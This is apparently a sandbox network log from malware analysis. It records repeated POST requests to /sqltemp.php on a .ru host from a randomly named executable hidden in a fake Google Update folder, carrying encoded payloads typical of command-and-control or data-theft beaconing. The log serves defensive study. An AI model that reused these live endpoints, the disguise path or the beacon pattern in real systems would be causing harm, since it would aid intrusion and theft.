                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBWXnbrJZufsxP%2BBboKhahFZ0n3%2FzEVju3W3fZjWkYEsJhJ2SOXL1zeT1WatHoGI%2FP1RXoIwvhCdQqtJI5HnmOWFMyQPUkUFxmVY3PQS2pWwcv7XmmzG9bekG9C8z%2FK7HQdzEJVu"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3641e4a0d728f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2105&min_rtt=2004&rtt_var=955&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=517914&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  27 | 192.168.2.6 | 62535 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:34.410774946 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:34.766614914 CET | 1124 | OUT | Data Raw: 56 52 5f 54 54 51 54 56 58 56 52 59 56 5d 59 55 5b 5f 54 5c 55 58 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_TTQTVXVRYV]YU[_T\UXPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&?5X ?*3>3@;%#^?8)=#!1<+;1<$.&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:02:34.854932070 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:35.119611025 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARD4OnDXoQsgscoWt6slAf0WYCaiD0uDPEYZYKwgJQCgY5yRllvAtw0OkrWxrJ35PYSIGGAhHTiH5xEr1E%2F%2Bey96pICFA46SA2p7rAHfAE1Cs4eUq69w0is1N%2FTBzdoIsPNZ4w%2BK"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364238fe08cb1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2395&min_rtt=1967&rtt_var=1593&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=270821&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  28 | 192.168.2.6 | 62541 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:35.263842106 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:35.637654066 CET | 1124 | OUT | Data Raw: 56 53 5f 55 54 51 54 54 58 56 52 59 56 5f 59 56 5b 52 54 59 55 5b 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_UTQTTXVRYV_YV[RTYU[P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3,>7<='=;C,)T#+*'=-#7T<<&/;U9:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:02:35.736032009 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:36.010420084 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rB4E9myUuiXPkWhEpj%2BZPPnuXp4agL%2BJFltbuYhCiGh0Y%2BzTEbbgbLfdOu4k2drjJj29LKcO2whRmgyhYPBgfsOTKEQ9BoiMbPMXD%2F%2Bx5V7zk8YdBSzRjOrIki5ZwE6eKKrwol71"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364290f316a5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3305&min_rtt=1696&rtt_var=3855&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=100171&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  29 | 192.168.2.6 | 62547 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:36.147686958 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:36.500844002 CET | 1124 | OUT | Data Raw: 53 53 5a 54 51 5c 51 56 58 56 52 59 56 51 59 53 5b 5f 54 51 55 5d 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SSZTQ\QVXVRYVQYS[_TQU]PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$=]#X3 ;*943<9+* Y!2 <85D2,*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:36.602008104 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:36.862668037 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFJeKBO2LDd2FnP%2FPP9eQlRraKsuI9uwlsxpYR3imbhbTZ%2BovmgdYLMW5e8cXIwhzGnf%2BwrRRqxu7FC5xXfTzh7hl1LMEM4gA9JUxpTYm0Hov1hTxLa%2F48%2FWoKQWFNrSMm49nnZb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3642e79b37c9f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10189&min_rtt=2039&rtt_var=17065&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=21712&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  30 | 192.168.2.6 | 62556 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:36.991485119 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:37.344645977 CET | 1124 | OUT | Data Raw: 56 54 5a 51 54 51 51 56 58 56 52 59 56 5d 59 5e 5b 5a 54 5a 55 5d 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VTZQTQQVXVRYV]Y^[ZTZU]P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._0)Y4>$8/\97[8Z(:'=. 2?(!%//.&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:02:37.445312977 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:37.715370893 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9oNFOT8e%2BoR%2Bj9aOirVtyuSBcBwd2UJGwZlM5F3haShxQt4MxHZMSrWETWmNIis8Q1oXnqPWCO11RjFA2ayQQJpgv1pIUEs5S1kGqBahHBjS3vFJR2KeXUVtXQ3Xw%2FB8CBYwbx8x"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36433ba1e4252-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8039&min_rtt=1726&rtt_var=13273&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=27952&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  31 | 192.168.2.6 | 62562 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:37.850720882 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:38.204386950 CET | 1124 | OUT | Data Raw: 53 57 5f 53 51 5d 54 55 58 56 52 59 56 50 59 54 5b 5c 54 50 55 5e 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_SQ]TUXVRYVPYT[\TPU^PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.&/#2$.@/:>!.3+:#= ] ! *8)C2+U-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:38.297251940 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:38.556778908 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJpKGtL0Uh3BCWSfTEQuEjsP5F96CDGIgY%2FNPCkMTAszOm%2FIJnyD5kpkDYl72OIhKfi%2F1YsbzUuDsXCTwTvIFTcfNlH7ws0X4MfDyg67HRSONUup8c6OVBSHS67mX8%2BYcauE%2Fn4S"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364391e425e7d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2913&min_rtt=1744&rtt_var=2992&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=131578&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  32 | 192.168.2.6 | 62570 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:38.694333076 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:39.047736883 CET | 1124 | OUT | Data Raw: 53 53 5f 5c 51 5f 54 53 58 56 52 59 56 50 59 56 5b 53 54 59 55 5f 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_\Q_TSXVRYVPYV[STYU_P]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&,>7X0#E827>'(9R=8Z#"/[<-B&#9&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:39.136064053 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  33 | 192.168.2.6 | 62571 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:39.179245949 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1948
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:39.532218933 CET | 1948 | OUT | Data Raw: 56 51 5a 56 54 58 54 50 58 56 52 59 56 59 59 50 5b 5b 54 5b 55 5a 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQZVTXTPXVRYVYYP[[T[UZPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'?)Y4<-_%>4.:)U4,Y?:8>X?7?Y<5E%,<-&Y.,Y-
Jan 1, 2025 16:02:39.641855955 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:39.931041956 CET | 954 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXPBReH2bN0Rzr2DaaZMpmIEXLvDPI9q%2Bh2VZqEqSvWJt4F%2Bys9IY0kroyDhH4LKujMKuvux9OUqcAAF9l4L3b6JShVZjc5DdgMOUDSsEW9r1VQxY9wUClqArFUuKiwfKaB%2FdFDr"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364417e1b0f39-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3187&min_rtt=1735&rtt_var=3555&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2250&delivery_rate=109330&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 09 29 2d 0f 08 31 0c 38 5d 28 3d 2c 0d 27 2e 22 58 2b 5e 3a 5d 33 07 24 04 3e 00 33 5d 36 12 2d 5b 31 38 38 13 23 2d 34 00 24 34 2b 59 05 1c 23 18 36 2f 28 11 28 2d 28 01 32 3c 31 58 27 2e 0e 5d 3c 06 2b 0b 20 2b 23 5b 30 3d 16 5d 3d 39 30 57 24 3f 3f 5b 39 11 08 0a 27 00 2c 54 00 11 26 57 27 1f 1a 59 34 19 24 5c 22 1f 31 12 26 0a 29 08 32 3f 23 18 20 39 08 5f 25 0b 20 00 23 33 2a 5f 26 38 2d 5a 20 2e 34 0b 2a 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&)-18](=,'."X+^:]3$>3]6-[188#-4$4+Y#6/((-(2<1X'.]<+ +#[0=]=90W$??[9',T&W'Y4$\"1&)2?# 9_% #3*_&8-Z .4*%S -H?WS0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 62575 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:39.299036026 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:39.657166004 CET | 1124 | OUT | Data Raw: 56 56 5a 53 54 5b 51 57 58 56 52 59 56 58 59 53 5b 5e 54 5f 55 5b 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VVZST[QWXVRYVXYS[^T_U[PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._&<:#,>0=;A,4-8X+=.<!1+[+*%?:&Y.,Y-%
Jan 1, 2025 16:02:39.742878914 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:40.016599894 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2FVoF1pwuUWsnpiJB2q7FdLIMqTRdpTpvWUV8UsDCzH3HSPc4sWh5p69IPm9zdS6ELP76xN%2FCs2Tzp8b3AkqhFTyyvOqyxeOJfa1qWA7hPQhx83dZ1hOKhVhKxDoYpCd1Eyer3uc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364421e91c333-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2460&min_rtt=1691&rtt_var=2172&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=186105&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 62583 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:40.146033049 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:02:40.501323938 CET | 1124 | OUT | Data Raw: 56 52 5f 51 54 5c 51 55 58 56 52 59 56 5b 59 54 5b 53 54 59 55 59 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_QT\QUXVRYV[YT[STYUYP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$Y5]7=_0.3@/\=V#.8<S)8!"+]<.%'.&Y.,Y-)
Jan 1, 2025 16:02:40.589988947 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:40.839793921 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
